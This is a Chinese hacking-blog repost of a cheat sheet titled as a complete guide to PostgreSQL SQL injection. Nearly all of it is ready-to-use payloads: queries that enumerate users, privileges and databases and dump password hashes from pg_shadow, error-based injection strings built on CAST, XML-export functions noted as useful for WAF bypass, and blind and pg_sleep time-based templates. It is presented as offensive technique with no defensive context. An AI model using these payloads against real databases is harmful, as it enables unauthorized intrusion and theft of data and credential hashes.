记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

PostgreSQL数据库SQL注入方法大全

2020-10-25 10:13

PostgreSQL数据库SQL注入方法大全-极度安全

0x00 Sqli

1、注释

--
/**/

2、查询版本

SELECT version()

3、查询用户

SELECT user;
SELECT current_user;
SELECT session_user;
SELECT usename FROM pg_user;
SELECT getpgusername();

4、列用户

SELECT usename FROM pg_user

5、列举用户hash

SELECT usename, passwd FROM pg_shadow

6、列出数据库管理员帐户

SELECT usename FROM pg_user WHERE usesuper IS TRUE

7、列举权限

SELECT usename, usecreatedb, usesuper, usecatupd FROM pg_user

8、列举当前db名称

SELECT current_database()

9、列举db

SELECT datname FROM pg_database

10、列举表名

SELECT table_name FROM information_schema.tables

11、列举列名

SELECT column_name FROM information_schema.columns WHERE table_name='data_table'

12、报错注入

,cAsT(chr(126)||vErSiOn()||chr(126)+aS+nUmeRiC)
,cAsT(chr(126)||(sEleCt+table_name+fRoM+information_schema.tables+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)--
,cAsT(chr(126)||(sEleCt+column_name+fRoM+information_schema.columns+wHerE+table_name='data_table'+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)--
,cAsT(chr(126)||(sEleCt+data_column+fRoM+data_table+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)

' and 1=cast((SELECT concat('DATABASE: ',current_database())) as int) and '1'='1
' and 1=cast((SELECT table_name FROM information_schema.tables LIMIT 1 OFFSET data_offset) as int) and '1'='1
' and 1=cast((SELECT column_name FROM information_schema.columns WHERE table_name='data_table' LIMIT 1 OFFSET data_offset) as int) and '1'='1
' and 1=cast((SELECT data_column FROM data_table LIMIT 1 OFFSET data_offset) as int) and '1'='1

13、xml helper

select query_to_xml('select * from pg_user',true,true,''); -- 可返回所有结果,可在报错注入中使用,另外query语句是个string就行,可进行拼接等方式进行waf绕过
select database_to_xml(true,true,''); -- dump the current database to XML
select database_to_xmlschema(true,true,''); -- dump the current db to an XML schema

14、盲注

' and substr(version(),1,10) = 'PostgreSQL' and '1 -> OK
' and substr(version(),1,10) = 'PostgreXXX' and '1 -> KO

15、延时注入

AND [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))
AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))


知识来源: https://www.secvery.com/3131.html

阅读:17993 | 评论:0 | 标签:注入 SQL

想收藏或者和大家分享这篇好文章→复制链接地址

“PostgreSQL数据库SQL注入方法大全”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

❤人人都能成为掌握黑客技术的英雄❤

ADS

标签云